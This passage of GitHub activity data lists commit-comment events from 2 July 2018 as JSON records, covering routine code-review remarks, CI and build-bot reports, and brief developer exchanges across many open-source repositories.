[Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/48767e21ebd16eb946cf58b2c39a5e604431653c/56/jenkins-results/generator-diff/index.html) (please review changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/48767e21ebd16eb946cf58b2c39a5e604431653c/56/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-02T15:41:32Z"}
{"id":"7907451525","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29568518,"position":52,"line":60,"path":"core/descriptors.runtime/src/kotlin/reflect/jvm/internal/components/RuntimePackagePartProvider.kt","commit_id":"9d7b0c460b8c455aa8539aa42fd3c16ffc060fc4","created_at":"2018-07-02T15:41:59Z","updated_at":"2018-07-02T15:41:59Z","author_association":"MEMBER","body":"You're right, thanks!"}},"created_at":"2018-07-02T15:41:59Z"}
{"id":"7907452178","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29568522,"position":4,"line":173,"path":"uiengine/src/main/java/com/axway/ats/uiengine/configuration/UiEngineConfigurator.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T15:42:07Z","updated_at":"2018-07-02T15:42:07Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T15:42:07Z"}
{"id":"7907454834","type":"CommitCommentEvent","actor":{"login":"silverprize"},"repo":{"name":"JakduK/jakduk-web"},"payload":{"comment":{"id":29568526,"position":null,"line":null,"path":null,"commit_id":"37a5a7151a2a4b2266cce8e3af2fcf9f2e58b61a","created_at":"2018-07-02T15:42:34Z","updated_at":"2018-07-02T15:42:34Z","author_association":"MEMBER","body":"vue.js로 바꾸었기 때문이죠."}},"created_at":"2018-07-02T15:42:34Z"}
{"id":"7907455555","type":"CommitCommentEvent","actor":{"login":"pierre-emmanuelJ"},"repo":{"name":"exoscale/egoscale"},"payload":{"comment":{"id":29568528,"position":null,"line":null,"path":null,"commit_id":"5f9d8d471d82810dcdf88adfef4ab3bbf03f8afc","created_at":"2018-07-02T15:42:43Z","updated_at":"2018-07-02T15:42:43Z","author_association":"MEMBER","body":"https://github.com/exoscale/egoscale/issues/208"}},"created_at":"2018-07-02T15:42:43Z"}
{"id":"7907460816","type":"CommitCommentEvent","actor":{"login":"muhrik"},"repo":{"name":"thomasmari/CZK_project"},"payload":{"comment":{"id":29568536,"position":null,"line":null,"path":null,"commit_id":"56692db728eab4ba79ded96c4622dd341c18d084","created_at":"2018-07-02T15:43:42Z","updated_at":"2018-07-02T15:43:42Z","author_association":"COLLABORATOR","body":"@thomasmari \r\nLooks like this model was broken. This is a very obvious mistake, I should have noticed it.\r\nThanks, i will fix it in the benchmark later.\r\n\r\nBy the way, read the comment next to the preemption variable declaration.\r\n0 means you should be doing the jobs, 1 means you should stop.\r\nI.e. it should be \r\n`[firstStage] (stage=0) && (preemption=0) --service1Time-> (stage'=1);`\r\ninstead of \r\n`[firstStage] (stage=0) && (preemption=1) --service1Time-> (stage'=1);`\r\nas you have it here."}},"created_at":"2018-07-02T15:43:42Z"}
{"id":"7907463807","type":"CommitCommentEvent","actor":{"login":"kavya1990"},"repo":{"name":"muvatech/Shopping-Cart-Using-Django-2.0-and-Python-3.6"},"payload":{"comment":{"id":29568541,"position":null,"line":null,"path":null,"commit_id":"c280b66df336285531d23f2eb4b0d0a881bed442","created_at":"2018-07-02T15:44:18Z","updated_at":"2018-07-02T15:44:18Z","author_association":"NONE","body":"Hi henry,\r\ntryed with below code but couldnt find solution.\r\nclass ShoppingCart(object):\r\n\r\n    def __init__(self):\r\n      self.total = 0\r\n      self.items = {}\r\n\r\n    def add_item(self, item_name, quantity, price):\r\n        self.total += (quantity * price)\r\n        self.items = {item_name : quantity}\r\n\r\n\r\n    def remove_item(self, item_name, quantity, price):\r\n        self.total -= (quantity * price)\r\n        if quantity > self.items[item_name]:\r\n          del self.items[item_name]\r\n        self.items[item_name] -= quantity\r\n\r\n\r\n    def checkout(self, cash_paid):\r\n        balance = 0\r\n        if cash_paid < self.total:\r\n          return \"Cash paid not enough\"\r\n        balance = cash_paid - self.total\r\n        return balance\r\n\r\n\r\nclass Shop(ShoppingCart):\r\n\r\n    def __init__(self):\r\n      ShoppingCart.__init__(self)\r\n      self.quantity = 100\r\n\r\n    def remove_item(self):\r\n        self.quantity -= 1"}},"created_at":"2018-07-02T15:44:18Z"}
{"id":"7907467327","type":"CommitCommentEvent","actor":{"login":"Urrby"},"repo":{"name":"Urrby/Layout-testing"},"payload":{"comment":{"id":29568546,"position":null,"line":null,"path":null,"commit_id":"7a33a54854dcce61dba8fc39aa4cbe61489e9ef9","created_at":"2018-07-02T15:44:59Z","updated_at":"2018-07-02T15:44:59Z","author_association":"OWNER","body":"OK "}},"created_at":"2018-07-02T15:44:59Z"}
{"id":"7907470735","type":"CommitCommentEvent","actor":{"login":"thiagomarini"},"repo":{"name":"vlucas/phpdotenv"},"payload":{"comment":{"id":29568554,"position":null,"line":null,"path":null,"commit_id":"ccefc518de84decb0709d98bf2677e37b176c27d","created_at":"2018-07-02T15:45:39Z","updated_at":"2018-07-02T15:45:39Z","author_association":"NONE","body":"All our slack channels had to urgently go between dounle quotes because of this commit... just sying.\r\n\r\n`TECH_CHANNEL=#tech` to `TECH_CHANNEL=\"#tech\"` "}},"created_at":"2018-07-02T15:45:39Z"}
{"id":"7907471212","type":"CommitCommentEvent","actor":{"login":"boffbowsh"},"repo":{"name":"alphagov/gds-way"},"payload":{"comment":{"id":29568557,"position":8,"line":14,"path":"source/standards/configuration-management.html.md.erb","commit_id":"319b805d23d36c9084f7ee9a0fe12b566969f74d","created_at":"2018-07-02T15:45:45Z","updated_at":"2018-07-02T15:45:45Z","author_association":"MEMBER","body":"\"for example the [govuk-aws][] repository\" doesn't work here, that is an example of configuring something for multiple parameters, not an example of a parameter. My original \"See x for an example\" is more correct in this case."}},"created_at":"2018-07-02T15:45:45Z"}
{"id":"7907471335","type":"CommitCommentEvent","actor":{"login":"gzm0"},"repo":{"name":"sjrd/scala-js"},"payload":{"comment":{"id":29568558,"position":null,"line":null,"path":null,"commit_id":"caaf3a947ca37ec49447b8b12633de7a1d70fced","created_at":"2018-07-02T15:45:46Z","updated_at":"2018-07-02T15:45:46Z","author_association":"NONE","body":"LGTM"}},"created_at":"2018-07-02T15:45:46Z"}
{"id":"7907475359","type":"CommitCommentEvent","actor":{"login":"boffbowsh"},"repo":{"name":"alphagov/gds-way"},"payload":{"comment":{"id":29568564,"position":5,"line":12,"path":"source/standards/configuration-management.html.md.erb","commit_id":"319b805d23d36c9084f7ee9a0fe12b566969f74d","created_at":"2018-07-02T15:46:32Z","updated_at":"2018-07-02T15:46:32Z","author_association":"MEMBER","body":"\"setting out\" doesn't explicitly mean turning into code. \"Codified\" may not be the best word here, but whatever you replace it with has to mean \"turning into code\""}},"created_at":"2018-07-02T15:46:32Z"}
{"id":"7907477728","type":"CommitCommentEvent","actor":{"login":"Spartelfant"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29568569,"position":null,"line":null,"path":null,"commit_id":"4415d1b6fc79420678ae6baed49840cc33c4ca60","created_at":"2018-07-02T15:47:00Z","updated_at":"2018-07-02T15:47:00Z","author_association":"NONE","body":"The previous time damage was set to 1, the boss HP went down drastically. Then damage was increased and boss HP increased again too. Wouldn't the same thing likely happen again? Or is this part of a larger strategy? Increasing damage, then on bosses with lots of HP reduce the damage again for maximum XP gains?"}},"created_at":"2018-07-02T15:47:00Z"}
{"id":"7907480509","type":"CommitCommentEvent","actor":{"login":"Korbeil"},"repo":{"name":"vlucas/phpdotenv"},"payload":{"comment":{"id":29568579,"position":null,"line":null,"path":null,"commit_id":"ccefc518de84decb0709d98bf2677e37b176c27d","created_at":"2018-07-02T15:47:33Z","updated_at":"2018-07-02T15:47:33Z","author_association":"CONTRIBUTOR","body":"Could you report the issue with your example here: https://github.com/vlucas/phpdotenv/issues/new ? \r\nI'll quickly try to fix it !"}},"created_at":"2018-07-02T15:47:33Z"}
{"id":"7907480807","type":"CommitCommentEvent","actor":{"login":"pascalseeland"},"repo":{"name":"ILIAS-eLearning/ILIAS"},"payload":{"comment":{"id":29568580,"position":null,"line":null,"path":null,"commit_id":"89c68b860b53e26a7fa9ef843cd609f3d45a25aa","created_at":"2018-07-02T15:47:37Z","updated_at":"2018-07-02T15:47:37Z","author_association":"CONTRIBUTOR","body":"Changing the method signature within a ILIAS release for plugins seams kind of dangerous for me and at least broke our opencast plugin that adds additions information to the info screen. I did not expect this to happen"}},"created_at":"2018-07-02T15:47:37Z"}
{"id":"7907482735","type":"CommitCommentEvent","actor":{"login":"muhrik"},"repo":{"name":"thomasmari/CZK_project"},"payload":{"comment":{"id":29568584,"position":null,"line":null,"path":null,"commit_id":"23cca1ff73185ab4960a4b81a6ed866a3f32b924","created_at":"2018-07-02T15:47:59Z","updated_at":"2018-07-02T15:47:59Z","author_association":"COLLABORATOR","body":"Yup, \r\n`[secondStage] (stage=1) & (preemption=0) --service2Time-> (stage'=0);`\r\nshould be the correct way."}},"created_at":"2018-07-02T15:47:59Z"}
{"id":"7907483609","type":"CommitCommentEvent","actor":{"login":"ericniebler"},"repo":{"name":"tcbrindle/NanoRange"},"payload":{"comment":{"id":29568587,"position":null,"line":null,"path":null,"commit_id":"95038e595ef5f1cb04e225d6715ed49ae6fb9063","created_at":"2018-07-02T15:48:09Z","updated_at":"2018-07-02T15:48:09Z","author_association":"NONE","body":"It is licensed under the MIT license. You can use it, but please keep the copyright and license. An acknowledgement would be nice but not necessary. I have a long-term plan to develop this a bit more and spin it into its own library. I suspect we'll be limping along with crummy/nonexistent compiler support for concepts for several years."}},"created_at":"2018-07-02T15:48:09Z"}
{"id":"7907484750","type":"CommitCommentEvent","actor":{"login":"n8d"},"repo":{"name":"EOSIO/eos"},"payload":{"comment":{"id":29568588,"position":41,"line":120,"path":"contracts/eosio.system/voting.cpp","commit_id":"8d0417fd8a575220b0b0f1a16e7ceef5d348f174","created_at":"2018-07-02T15:48:21Z","updated_at":"2018-07-02T15:48:21Z","author_association":"NONE","body":"Can we get an idea why this automated deactivation was removed? Was it a performance issue?"}},"created_at":"2018-07-02T15:48:21Z"}
{"id":"7907485129","type":"CommitCommentEvent","actor":{"login":"nanomobile"},"repo":{"name":"bitshares/bitshares-fc"},"payload":{"comment":{"id":29568589,"position":null,"line":null,"path":null,"commit_id":"a549c6e6db81854031cc5c3e42dc1e65c4d4389c","created_at":"2018-07-02T15:48:25Z","updated_at":"2018-07-02T15:48:25Z","author_association":"NONE","body":":+1: "}},"created_at":"2018-07-02T15:48:25Z"}
{"id":"7907488228","type":"CommitCommentEvent","actor":{"login":"urvish-mahida-exa"},"repo":{"name":"Yelp/elastalert"},"payload":{"comment":{"id":29568597,"position":null,"line":null,"path":null,"commit_id":"9c6e4d4d16361b604dc89f6a95296da5f03a815e","created_at":"2018-07-02T15:49:00Z","updated_at":"2018-07-02T15:49:00Z","author_association":"CONTRIBUTOR","body":"@Qmando ah ok. Thanks for catch that 'OR' bug, good changes !\r\nAlso, if you have some time, would be able to cut a release ?"}},"created_at":"2018-07-02T15:49:00Z"}
{"id":"7907488826","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29568598,"position":null,"line":null,"path":null,"commit_id":"eb68ccb2bfb3d01807412e33399299da8cdb4b11","created_at":"2018-07-02T15:49:07Z","updated_at":"2018-07-02T15:49:07Z","author_association":"NONE","body":"158538153-Maximum-Curve-Output-is-always-ignored-#6365 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2969 of 2969 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eb68ccb2bfb3d01807412e33399299da8cdb4b11-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eb68ccb2bfb3d01807412e33399299da8cdb4b11-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-02T15:49:07Z"}
{"id":"7907491774","type":"CommitCommentEvent","actor":{"login":"ocornut"},"repo":{"name":"warrenm/imgui"},"payload":{"comment":{"id":29568601,"position":7,"line":7,"path":"examples/imgui_impl_metal.h","commit_id":"da1b72625310b6e5fc4dbfa056c2d0b36d0f1498","created_at":"2018-07-02T15:49:38Z","updated_at":"2018-07-02T15:49:38Z","author_association":"NONE","body":"I don't know ObjC but it is possible to forward declare anything that is being pointed to, to avoid header files dragging on more includes?"}},"created_at":"2018-07-02T15:49:38Z"}
{"id":"7907495029","type":"CommitCommentEvent","actor":{"login":"muhrik"},"repo":{"name":"thomasmari/CZK_project"},"payload":{"comment":{"id":29568608,"position":null,"line":null,"path":null,"commit_id":"23cca1ff73185ab4960a4b81a6ed866a3f32b924","created_at":"2018-07-02T15:50:15Z","updated_at":"2018-07-02T15:50:15Z","author_association":"COLLABORATOR","body":"So how similar is the Oris steady-state distribution to the PRISM GSMP steady-state distribution ?"}},"created_at":"2018-07-02T15:50:15Z"}
{"id":"7907495320","type":"CommitCommentEvent","actor":{"login":"zarechenskiy"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29568609,"position":5,"line":4,"path":"compiler/testData/cli/jvm/internalArgMissingModificator.args","commit_id":"7ae5018d6981ab8905483994418f06c287fd2004","created_at":"2018-07-02T15:50:17Z","updated_at":"2018-07-02T15:50:17Z","author_association":"MEMBER","body":"Probably `SoundSmartCastsAfterTry`?"}},"created_at":"2018-07-02T15:50:17Z"}
{"id":"7907498437","type":"CommitCommentEvent","actor":{"login":"muhrik"},"repo":{"name":"thomasmari/CZK_project"},"payload":{"comment":{"id":29568617,"position":null,"line":null,"path":null,"commit_id":"d63119e6c87c568a6c831289e53005aa60d2e917","created_at":"2018-07-02T15:50:49Z","updated_at":"2018-07-02T15:50:49Z","author_association":"COLLABORATOR","body":"How similar is the Oris steady-state distribution to the PRISM GSMP steady-state distribution for this model?"}},"created_at":"2018-07-02T15:50:49Z"}
{"id":"7907499757","type":"CommitCommentEvent","actor":{"login":"thiagomarini"},"repo":{"name":"vlucas/phpdotenv"},"payload":{"comment":{"id":29568619,"position":null,"line":null,"path":null,"commit_id":"ccefc518de84decb0709d98bf2677e37b176c27d","created_at":"2018-07-02T15:51:03Z","updated_at":"2018-07-02T15:51:03Z","author_association":"NONE","body":"Issue created: https://github.com/vlucas/phpdotenv/issues/276"}},"created_at":"2018-07-02T15:51:03Z"}
{"id":"7907502453","type":"CommitCommentEvent","actor":{"login":"zarechenskiy"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29568625,"position":5,"line":4,"path":"compiler/testData/cli/jvm/internalArgWrongPrefix.args","commit_id":"7ae5018d6981ab8905483994418f06c287fd2004","created_at":"2018-07-02T15:51:32Z","updated_at":"2018-07-02T15:51:32Z","author_association":"MEMBER","body":"Also `SoundSmartCastsAfterTry`"}},"created_at":"2018-07-02T15:51:32Z"}
{"id":"7907503778","type":"CommitCommentEvent","actor":{"login":"Aaahh"},"repo":{"name":"torococo/HAL"},"payload":{"comment":{"id":29568626,"position":78,"line":54,"path":"Examples/MarkModel3/TestVis.java","commit_id":"ccc2ec1865f1e33a10447ed1c5d1461485a76381","created_at":"2018-07-02T15:51:47Z","updated_at":"2018-07-02T15:51:47Z","author_association":"NONE","body":"no rename?"}},"created_at":"2018-07-02T15:51:47Z"}
{"id":"7907504195","type":"CommitCommentEvent","actor":{"login":"Submem"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29568628,"position":null,"line":null,"path":null,"commit_id":"4415d1b6fc79420678ae6baed49840cc33c4ca60","created_at":"2018-07-02T15:51:51Z","updated_at":"2018-07-02T15:51:51Z","author_association":"NONE","body":"People download new update please. We have killed a 110M health boss in a very short time obtaining very poor EXP."}},"created_at":"2018-07-02T15:51:51Z"}
{"id":"7907509689","type":"CommitCommentEvent","actor":{"login":"sfan02"},"repo":{"name":"USEPA/EPA_Express_Code"},"payload":{"comment":{"id":29568646,"position":null,"line":null,"path":null,"commit_id":"a57572abe1d3a2a944b944701337f1c8a5c6ace3","created_at":"2018-07-02T15:52:52Z","updated_at":"2018-07-02T15:52:52Z","author_association":"CONTRIBUTOR","body":"Added ez."}},"created_at":"2018-07-02T15:52:52Z"}
{"id":"7907514375","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29568655,"position":null,"line":null,"path":null,"commit_id":"eb68ccb2bfb3d01807412e33399299da8cdb4b11","created_at":"2018-07-02T15:53:45Z","updated_at":"2018-07-02T15:53:45Z","author_association":"NONE","body":"158538153-Maximum-Curve-Output-is-always-ignored-#6365 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eb68ccb2bfb3d01807412e33399299da8cdb4b11-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-02T15:53:45Z"}
{"id":"7907520251","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29568664,"position":1,"line":26,"path":"monitoringlibrary/src/main/java/com/axway/ats/monitoring/SystemMonitor.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T15:54:49Z","updated_at":"2018-07-02T15:54:49Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T15:54:49Z"}
{"id":"7907522496","type":"CommitCommentEvent","actor":{"login":"sjrd"},"repo":{"name":"scala-js/scala-js"},"payload":{"comment":{"id":29568669,"position":null,"line":null,"path":null,"commit_id":"caaf3a947ca37ec49447b8b12633de7a1d70fced","created_at":"2018-07-02T15:55:14Z","updated_at":"2018-07-02T15:55:14Z","author_association":"MEMBER","body":"Full CI matrix: https://scala-webapps.epfl.ch/sjsjenkins/blue/organizations/jenkins/scalajs-main/detail/master/141/pipeline\r\n\r\n* [ ] CI green\r\n* [ ] HTML runner tests\r\n* [ ] Source map tests"}},"created_at":"2018-07-02T15:55:14Z"}
{"id":"7907527541","type":"CommitCommentEvent","actor":{"login":"mdoerfel"},"repo":{"name":"qvitech/emf4cpp"},"payload":{"comment":{"id":29568675,"position":null,"line":null,"path":null,"commit_id":"15a92ebdc6bc8c80afa92e54f409fc3168d13555","created_at":"2018-07-02T15:56:09Z","updated_at":"2018-07-02T15:56:09Z","author_association":"NONE","body":"Hi qvitech,\r\n\r\nthere are some issues with your commits, e.g. the code does not compile due to undeclared functions.\r\n\r\nYour email address in the commits seems to work no longer. Would you please contact me for clarification? You can find my email address in the commit history.\r\n\r\nThanks,\r\nMatthias."}},"created_at":"2018-07-02T15:56:09Z"}
{"id":"7907528511","type":"CommitCommentEvent","actor":{"login":"NenivaqXuhzne"},"repo":{"name":"NenivaqXuhzne/NenivaqXuhzne.github.io"},"payload":{"comment":{"id":29568677,"position":null,"line":null,"path":null,"commit_id":"24e94e935ea21bc92057cbfc8ef98a093dd9015c","created_at":"2018-07-02T15:56:17Z","updated_at":"2018-07-02T15:56:17Z","author_association":"OWNER","body":"initial commit"}},"created_at":"2018-07-02T15:56:17Z"}
{"id":"7907528734","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/loky-feedstock"},"payload":{"comment":{"id":29568679,"position":null,"line":null,"path":null,"commit_id":"9676b91d8bb8e473690c1f7d380f0de76ebe19f8","created_at":"2018-07-02T15:56:20Z","updated_at":"2018-07-02T15:56:20Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @tommoral were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @tommoral were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-02T15:56:20Z"}
{"id":"7907530191","type":"CommitCommentEvent","actor":{"login":"soupdragon99"},"repo":{"name":"alphagov/gds-way"},"payload":{"comment":{"id":29568685,"position":5,"line":12,"path":"source/standards/configuration-management.html.md.erb","commit_id":"319b805d23d36c9084f7ee9a0fe12b566969f74d","created_at":"2018-07-02T15:56:35Z","updated_at":"2018-07-02T15:56:35Z","author_association":"CONTRIBUTOR","body":"OK I understand, I'll edit this to reflect that."}},"created_at":"2018-07-02T15:56:35Z"}
{"id":"7907530512","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29568686,"position":1,"line":5,"path":"uiengine/pom.xml","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T15:56:38Z","updated_at":"2018-07-02T15:56:38Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T15:56:38Z"}
{"id":"7907531858","type":"CommitCommentEvent","actor":{"login":"agraf"},"repo":{"name":"Gateworks/uboot-newport"},"payload":{"comment":{"id":29568687,"position":null,"line":null,"path":null,"commit_id":"92feceb44359ee28c7ca53fb45894b8d6fd607db","created_at":"2018-07-02T15:56:53Z","updated_at":"2018-07-02T15:56:53Z","author_association":"CONTRIBUTOR","body":"That patch looks very sensible. Are you pushing this back to Cavium, so that their next U-Boot drop will include it? Or maybe we should just think of pushing Octeon-TX support upstream and inherit it that way."}},"created_at":"2018-07-02T15:56:53Z"}
{"id":"7907533671","type":"CommitCommentEvent","actor":{"login":"agraf"},"repo":{"name":"Gateworks/uboot-newport"},"payload":{"comment":{"id":29568692,"position":null,"line":null,"path":null,"commit_id":"7de21cea0a97a0d7931adafe69e91bd08b98f222","created_at":"2018-07-02T15:57:11Z","updated_at":"2018-07-02T15:57:11Z","author_association":"CONTRIBUTOR","body":"What's the rationale behind this change? EFI_LOADER can be quite useful :)"}},"created_at":"2018-07-02T15:57:11Z"}
{"id":"7907535656","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29568696,"position":7,"line":34,"path":"testharness/src/main/java/com/axway/ats/harness/testng/RetryAnalyzer.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T15:57:33Z","updated_at":"2018-07-02T15:57:33Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T15:57:33Z"}
{"id":"7907538341","type":"CommitCommentEvent","actor":{"login":"oksweet6"},"repo":{"name":"oksweet6/OK-Sweet-fe-group-41-fe-team-201-Project-Pix-Maker"},"payload":{"comment":{"id":29568702,"position":null,"line":null,"path":null,"commit_id":"5f24aaeef06a6799af2a4d346f5343e34dccf13b","created_at":"2018-07-02T15:58:04Z","updated_at":"2018-07-02T15:58:04Z","author_association":"OWNER","body":"oksweet6.github.io."}},"created_at":"2018-07-02T15:58:04Z"}
{"id":"7907538951","type":"CommitCommentEvent","actor":{"login":"tve"},"repo":{"name":"jeelabs/jeeh"},"payload":{"comment":{"id":29568704,"position":30,"line":287,"path":"arch/stm32l0.h","commit_id":"91c83b2c8d71cdb77743111baa4f4f213e1c632c","created_at":"2018-07-02T15:58:11Z","updated_at":"2018-07-02T15:58:11Z","author_association":"MEMBER","body":"Yes, it turned out to be needed. I hadn't pushed my \"final\" version, sorry for that."}},"created_at":"2018-07-02T15:58:11Z"}
{"id":"7907540850","type":"CommitCommentEvent","actor":{"login":"wborn"},"repo":{"name":"eclipse/smarthome"},"payload":{"comment":{"id":29568709,"position":164,"line":126,"path":"docs/documentation/concepts/units-of-measurement.md","commit_id":"7c3a53c83e11d50ee88afe86a16333e5d6b8713d","created_at":"2018-07-02T15:58:32Z","updated_at":"2018-07-02T15:58:32Z","author_association":"CONTRIBUTOR","body":"Looks like the UoM library itself uses metre instead of meter. :-)"}},"created_at":"2018-07-02T15:58:32Z"}
{"id":"7907541211","type":"CommitCommentEvent","actor":{"login":"xbauquet"},"repo":{"name":"lefreepatate/Project_1_Game"},"payload":{"comment":{"id":29568710,"position":21,"line":23,"path":"Project_1_Game/characters.swift","commit_id":"99f405c8d3dadfb6c914ab7389789268ca93a1d6","created_at":"2018-07-02T15:58:36Z","updated_at":"2018-07-02T15:58:36Z","author_association":"COLLABORATOR","body":"You don't need this switch at all. All the attributes are set in the init of the classes (Fighter, Wizard ....)"}},"created_at":"2018-07-02T15:58:36Z"}
{"id":"7907543538","type":"CommitCommentEvent","actor":{"login":"muhrik"},"repo":{"name":"thomasmari/CZK_project"},"payload":{"comment":{"id":29568714,"position":null,"line":null,"path":null,"commit_id":"64add0f4ac8f5f3ccdd0a5f7879cf6427815c086","created_at":"2018-07-02T15:59:04Z","updated_at":"2018-07-02T15:59:04Z","author_association":"COLLABORATOR","body":"Fantastic results.\r\nSo for some models PRISM GSMP is significantly faster than Oris?\r\nI am ecstatic to hear that.\r\nBy the way, if you used my latest PRISM GSMP version (don't compute kappa by default, and only use 10^-330 constant kappa by default), the difference would be even greater :-)\r\n\r\nI think these results might be interesting enough to write about. \r\nI would like to hear more about this."}},"created_at":"2018-07-02T15:59:04Z"}
{"id":"7907546462","type":"CommitCommentEvent","actor":{"login":"aproeme"},"repo":{"name":"dvalters/HAIL-CAESAR"},"payload":{"comment":{"id":29568721,"position":null,"line":null,"path":null,"commit_id":"c9cf26a9afc56ad0353273f891d46ff196fb58bd","created_at":"2018-07-02T15:59:35Z","updated_at":"2018-07-02T15:59:35Z","author_association":"COLLABORATOR","body":"Wrong username tagged in commit, should have been @dvalters"}},"created_at":"2018-07-02T15:59:35Z"}
{"id":"7907547321","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29568725,"position":1,"line":28,"path":"rbv/src/main/java/com/axway/ats/rbv/clients/DbVerification.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T15:59:44Z","updated_at":"2018-07-02T15:59:44Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T15:59:44Z"}
{"id":"7907550086","type":"CommitCommentEvent","actor":{"login":"aka-sektor"},"repo":{"name":"abramcumner/xray15"},"payload":{"comment":{"id":29568735,"position":null,"line":null,"path":null,"commit_id":"bfc77342e24e5ec658f35b74ccd3b746fd58d18b","created_at":"2018-07-02T16:00:12Z","updated_at":"2018-07-02T16:00:12Z","author_association":"NONE","body":"Ну и названице, что это?"}},"created_at":"2018-07-02T16:00:12Z"}
{"id":"7907555183","type":"CommitCommentEvent","actor":{"login":"dprasannak"},"repo":{"name":"jOOQ/jOOX"},"payload":{"comment":{"id":29568750,"position":null,"line":null,"path":null,"commit_id":"d6ee7adbaa5e5befac41e22c8dbddc7d572d5383","created_at":"2018-07-02T16:01:00Z","updated_at":"2018-07-02T16:01:00Z","author_association":"NONE","body":"Can I please have a jar? Thanks!"}},"created_at":"2018-07-02T16:01:00Z"}
{"id":"7907555746","type":"CommitCommentEvent","actor":{"login":"Knurlnheim"},"repo":{"name":"MichMich/MagicMirror"},"payload":{"comment":{"id":29568753,"position":null,"line":null,"path":null,"commit_id":"0e2e8d2e2aca2f8d0f1f2eb7b213577fcc4f623a","created_at":"2018-07-02T16:01:06Z","updated_at":"2018-07-02T16:01:06Z","author_association":"NONE","body":"Works for me, thanks. \r\nI think it's related to the whole \"old\" vs \"new\" free API keys debate...\r\nsee: \r\nhttps://openweathermap.org/forecast16#JSON => no dt_txt\r\nbut \r\nhttps://openweathermap.org/forecast5#JSON => has a dt_txt since it's a 3h forecast..."}},"created_at":"2018-07-02T16:01:06Z"}
{"id":"7907558701","type":"CommitCommentEvent","actor":{"login":"MasterOdin"},"repo":{"name":"Submitty/Submitty"},"payload":{"comment":{"id":29568763,"position":null,"line":null,"path":null,"commit_id":"c0bf38c525bdbe8ef50066dedc1091538b6364c8","created_at":"2018-07-02T16:01:35Z","updated_at":"2018-07-02T16:01:35Z","author_association":"MEMBER","body":"Sorry @bmcutler, meant to make this a PR first, but hit the wrong button the web interface. Pulling this change out of #2278 as I'd want this landed sooner rather than later."}},"created_at":"2018-07-02T16:01:35Z"}
{"id":"7907560696","type":"CommitCommentEvent","actor":{"login":"vinay-deshmukh"},"repo":{"name":"vinay-deshmukh/MyLibApp"},"payload":{"comment":{"id":29568772,"position":24,"line":17,"path":"app/src/main/res/layout/frag_issued_books.xml","commit_id":"d87b8db98fcfb428f177aaea2228a2ce560a4e29","created_at":"2018-07-02T16:01:56Z","updated_at":"2018-07-02T16:01:56Z","author_association":"OWNER","body":"Make this button width to be match_parent"}},"created_at":"2018-07-02T16:01:56Z"}
